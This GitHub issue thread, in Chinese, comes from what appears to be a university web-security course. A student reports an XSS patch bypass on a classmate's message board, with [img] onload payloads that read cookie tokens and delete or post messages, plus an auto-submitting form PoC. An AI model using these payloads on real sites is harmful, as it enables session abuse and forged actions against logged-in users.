B10815040 之漏洞回報

TaiYou-TW commented 2 years ago

攻擊者學號：B10715036 @a24230928

被攻擊者學號與網址：B10815040 @tonatfish http://52.170.251.78:8080

漏洞類型：XSS（bypass patch）、CSRF（delete）、CSRF（comment）

漏洞描述可繞過之前的 XSS Patch 執行 JS 並進行 CSRF 攻擊。攻擊者可以在留言板上留下以下 POC，如果有登入中的使用者打開留言板即會自動刪除指定留言（若目前使用者為該篇作者）以及發布新的留言。

PoC

刪除指定留言
[img]https://demo.shing227.works/headshot/27.jpg" onload="fetch('http://52.170.251.78:8000/msg/63', {method: 'DELETE',body: JSON.stringify({'token': document.cookie.split('; ')[1].split('=')[1],'userid': document.cookie.split('; ')[0].split('=')[1]}),headers: new Headers({'Content-Type': 'application/json'})})"//[/img]

發布新留言
[img]https://demo.shing227.works/headshot/27.jpg" onload="fetch('http://52.170.251.78:8000/msg', {method: 'POST',body: JSON.stringify({'token': document.cookie.split('; ')[1].split('=')[1],'userid': document.cookie.split('; ')[0].split('=')[1], 'content': 'HI'}),headers: new Headers({'Content-Type': 'application/json'})})"//[/img]

tonatfish commented 2 years ago

報告請問這個XSS的漏洞也跟之前的算做一樣的項目對嗎

a24230928 @.***> 於 2022年4月30日週六上午1:00寫道：

攻擊者學號：B10715036 @a24230928 https://github.com/a24230928

被攻擊者學號與網址：B10815040 @tonatfish https://github.com/tonatfish http://52.170.251.78:8080

漏洞類型：XSS（bypass patch）、CSRF（delete）、CSRF（comment）

漏洞描述可繞過之前的 XSS Patch 執行 JS 並進行 CSRF 攻擊。攻擊者可以在留言板上留下以下 POC，如果有登入中的使用者打開留言板即會自動刪除指定留言（若目前使用者為該篇作者）以及發布新的留言。

PoC

刪除指定留言

[img]https://demo.shing227.works/headshot/27.jpg" onload="fetch('http://52.170.251.78:8000/msg/63', {method: 'DELETE',body: JSON.stringify({'token': document.cookie.split('; ')[1].split('=')[1],'userid': document.cookie.split('; ')[0].split('=')[1]}),headers: new Headers({'Content-Type': 'application/json'})})"//[/img]

發布新留言

[img]https://demo.shing227.works/headshot/27.jpg" onload="fetch('http://52.170.251.78:8000/msg', {method: 'POST',body: JSON.stringify({'token': document.cookie.split('; ')[1].split('=')[1],'userid': document.cookie.split('; ')[0].split('=')[1], 'content': 'HI'}),headers: new Headers({'Content-Type': 'application/json'})})"//[/img]

— Reply to this email directly, view it on GitHub https://github.com/Taiwan-Tech-WebSec/Bug-Report/issues/46, or unsubscribe https://github.com/notifications/unsubscribe-auth/AKJ2GLEDL4652M6QSXFSQILVHQIURANCNFSM5UWVGPSA . You are receiving this because you were mentioned.Message ID: @.***>

TaiYou-TW commented 2 years ago

我想確認一下你補過之前那個洞了嗎？我感覺是有被擋，雖然還是繞得過去，所以想確認一下是我戳到 bug 還是你的 waf

報告請問這個XSS的漏洞也跟之前的算做一樣的項目對嗎 a24230928 @.> 於 2022年4月30日週六上午1:00寫道： … 攻擊者學號：B10715036 @a24230928 https://github.com/a24230928 被攻擊者學號與網址：B10815040 @tonatfish https://github.com/tonatfish http://52.170.251.78:8080 漏洞類型：XSS（bypass patch）、CSRF（delete）、CSRF（comment）漏洞描述可繞過之前的 XSS Patch 執行 JS 並進行 CSRF 攻擊。攻擊者可以在留言板上留下以下 POC，如果有登入中的使用者打開留言板即會自動刪除指定留言（若目前使用者為該篇作者）以及發布新的留言。 PoC 刪除指定留言 [img]https://demo.shing227.works/headshot/27.jpg" onload="fetch('http://52.170.251.78:8000/msg/63', {method: 'DELETE',body: JSON.stringify({'token': document.cookie.split('; ')[1].split('=')[1],'userid': document.cookie.split('; ')[0].split('=')[1]}),headers: new Headers({'Content-Type': 'application/json'})})"//[/img] 發布新留言 [img]https://demo.shing227.works/headshot/27.jpg" onload="fetch('http://52.170.251.78:8000/msg', {method: 'POST',body: JSON.stringify({'token': document.cookie.split('; ')[1].split('=')[1],'userid': document.cookie.split('; ')[0].split('=')[1], 'content': 'HI'}),headers: new Headers({'Content-Type': 'application/json'})})"//[/img] — Reply to this email directly, view it on GitHub <#46>, or unsubscribe https://github.com/notifications/unsubscribe-auth/AKJ2GLEDL4652M6QSXFSQILVHQIURANCNFSM5UWVGPSA . You are receiving this because you were mentioned.Message ID: @.>

TaiYou-TW commented 2 years ago

另外想起來這不是 cross site，所以補一下 cross site 的描述：

攻擊者學號：B10715036 @a24230928

被攻擊者學號與網址：B10815040 @tonatfish http://52.170.251.78:8080/

漏洞類型：CSRF（comment）

漏洞描述攻擊者可以用以下 POC 構造一個網頁，如果有登入中的使用者打開此頁面即會自動發布新的留言。

PoC

<form action="http://52.170.251.78:8000/msg" id="form1" method="post" enctype="text/plain">
    <input type="text" name='{"token": "485xxx419", "userid": "51c82b81-xxxx-xxxx-xxxx-f0f1d21a59f7", "content":"'
        value='DELETE"}'>
</form>
<script>
    document.querySelector('#form1').submit();
</script>

tonatfish commented 2 years ago

其實我推了以後沒有改過扣:3

a24230928 @.***> 於 2022年4月30日週六 01:45 寫道：

另外想起來這不是 cross site，所以補一下 cross site 的描述：

攻擊者學號：B10715036 @a24230928 https://github.com/a24230928

被攻擊者學號與網址：B10815040 @tonatfish https://github.com/tonatfish http://52.170.251.78:8080/

漏洞類型：XSS（bypass patch）、CSRF（comment）

漏洞描述可繞過之前的 XSS Patch 執行 JS 並進行 CSRF 攻擊。攻擊者可以在留言板上留下以下 POC，如果有登入中的使用者打開留言板即會自動發布新的留言。

PoC

— Reply to this email directly, view it on GitHub https://github.com/Taiwan-Tech-WebSec/Bug-Report/issues/46#issuecomment-1113567234, or unsubscribe https://github.com/notifications/unsubscribe-auth/AKJ2GLHTBREWD5DCKF7ML43VHQNZZANCNFSM5UWVGPSA . You are receiving this because you were mentioned.Message ID: @.***>

TaiYou-TW commented 2 years ago

其實我推了以後沒有改過扣:3 a24230928 @.> 於 2022年4月30日週六 01:45 寫道： … 另外想起來這不是 cross site，所以補一下 cross site 的描述：攻擊者學號：B10715036 @a24230928 https://github.com/a24230928 被攻擊者學號與網址：B10815040 @tonatfish https://github.com/tonatfish http://52.170.251.78:8080/ 漏洞類型：XSS（bypass patch）、CSRF（comment）漏洞描述可繞過之前的 XSS Patch 執行 JS 並進行 CSRF 攻擊。攻擊者可以在留言板上留下以下 POC，如果有登入中的使用者打開留言板即會自動發布新的留言。 PoC
— Reply to this email directly, view it on GitHub <#46 (comment)>, or unsubscribe https://github.com/notifications/unsubscribe-auth/AKJ2GLHTBREWD5DCKF7ML43VHQNZZANCNFSM5UWVGPSA . You are receiving this because you were mentioned.Message ID:
@.>

真的嗎XD 那可能我自己哪邊打錯了謝ㄌ

tonatfish commented 2 years ago

話說想問一下如果你登出用別的帳號登入還能work嗎沒記錯的話登出會把token洗掉

a24230928 @.***> 於 2022年4月30日週六上午1:48寫道：

其實我推了以後沒有改過扣:3 a24230928 @.

> 於 2022年4月30日週六 01:45 寫道： … <#m6432196219837668355> 另外想起來這不是 cross site，所以補一下 cross site 的描述：攻擊者學號：B10715036 @a24230928 https://github.com/a24230928 https://github.com/a24230928 https://github.com/a24230928 被攻擊者學號與網址：B10815040 @tonatfish https://github.com/tonatfish https://github.com/tonatfish https://github.com/tonatfish http://52.170.251.78:8080/ http://52.170.251.78:8080/ 漏洞類型：XSS（bypass patch）、CSRF（comment）漏洞描述可繞過之前的 XSS Patch 執行 JS 並進行 CSRF 攻擊。攻擊者可以在留言板上留下以下 POC，如果有登入中的使用者打開留言板即會自動發布新的留言。 PoC

— Reply to this email directly, view it on GitHub <#46 (comment) >, or unsubscribe https://github.com/notifications/unsubscribe-auth/AKJ2GLHTBREWD5DCKF7ML43VHQNZZANCNFSM5UWVGPSA . You are receiving this because you were mentioned.Message ID: @.*>

真的嗎XD 那可能我自己哪邊打錯了謝ㄌ

— Reply to this email directly, view it on GitHub https://github.com/Taiwan-Tech-WebSec/Bug-Report/issues/46#issuecomment-1113569791, or unsubscribe https://github.com/notifications/unsubscribe-auth/AKJ2GLHFOD7AFGSL5WOC6P3VHQOF3ANCNFSM5UWVGPSA . You are receiving this because you were mentioned.Message ID: @.***>

TaiYou-TW commented 2 years ago

登出後會把 token 洗掉沒錯，目前是仰賴偷出的 cookie 來實作

tonatfish commented 2 years ago

喔喔對了解感謝~

a24230928 @.***> 於 2022年4月30日週六 11:55 寫道：

登出後會把 token 洗掉沒錯，目前是仰賴偷出的 cookie 來實作

— Reply to this email directly, view it on GitHub https://github.com/Taiwan-Tech-WebSec/Bug-Report/issues/46#issuecomment-1113906095, or unsubscribe https://github.com/notifications/unsubscribe-auth/AKJ2GLA4CU42SZ763XQQJELVHSVL3ANCNFSM5UWVGPSA . You are receiving this because you were mentioned.Message ID: @.***>

tonatfish commented 2 years ago

報告漏洞有修補了可以再試試看!

splitline commented 2 years ago

這樣 CSRF 不算喔，只是 XSS 而已 CSRF 為 Cross-Site Request Forgery

這種必須仰賴 XSS 達成的攻擊，只是單純基於 XSS 漏洞的利用，與 CSRF 無關

不過難得看到有人利用 form post 嘗試達成 JSON-based CSRF 蠻酷的 XD

TaiYou-TW commented 2 years ago

以前資安實務學到ㄉ很實用 (`･∀･)b

這樣 CSRF 不算喔，只是 XSS 而已 CSRF 為 Cross-Site Request Forgery

這種必須仰賴 XSS 達成的攻擊，只是單純基於 XSS 漏洞的利用，與 CSRF 無關

不過難得看到有人利用 form post 嘗試達成 JSON-based CSRF 蠻酷的 XD

TaiYou-TW commented 2 years ago

已修復

報告漏洞有修補了可以再試試看!

Taiwan-Tech-WebSec / Bug-Report

B10815040 之漏洞回報 #46